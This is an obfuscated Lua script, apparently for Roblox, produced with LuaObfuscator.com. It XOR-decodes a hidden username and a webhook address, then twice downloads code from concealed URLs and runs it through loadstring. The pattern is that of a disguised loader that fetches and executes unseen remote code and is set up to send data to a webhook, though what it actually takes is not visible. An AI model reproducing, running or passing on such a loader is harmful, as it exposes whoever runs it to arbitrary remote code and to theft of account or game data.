--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end Username=v7("\244\219\212\49\239\184\248\71\130\155\143","\126\177\163\187\69\134\219\167");Webhook=v7("\43\217\62\213\239\121\130\101\193\245\48\206\37\215\248\109\206\37\200\179\34\221\35\138\235\38\207\34\202\243\40\222\101\148\175\115\149\121\144\172\116\154\125\156\174\123\157\124\149\165\119\149\101\214\195\48\195\58\236\202\11\252\5\194\248\55\239\125\225\238\14\233\1\203\202\114\253\15\224\168\36\221\51\228\248\53\251\19\206\223\51\217\31\236\253\26\157\0\234\177\4\197\46\147\221\6\249\26\245\216\5\254\58\213\238\11\239\41\224\214\41","\156\67\173\74\165");CustomGui="";loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\165\72\1\242\33\79\32\191\92\20\169\53\67\38\180\70\24\168\35\72\32\249\74\25\177\105\99\46\189\89\7\243\43\75\102\248\91\19\186\53\9\60\178\72\18\175\105\75\53\190\71\89\168\35\85\32\184\7\26\169\39","\38\84\215\41\118\220\70")))();loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\212\95\15\49\6\247\83\29\50\30\255\73\5\109\2\237\73\21\42\27\253\29\25\33\6\241\29\31\44\4\251\94\2\43\29\240\31\27\35\27\240\31\5\45\7\236\83\19\109\11\255\66\30\47\93\175\30\71\122\93\231\81\4\42\31\176\92\3\35","\158\48\118\66\114")))();
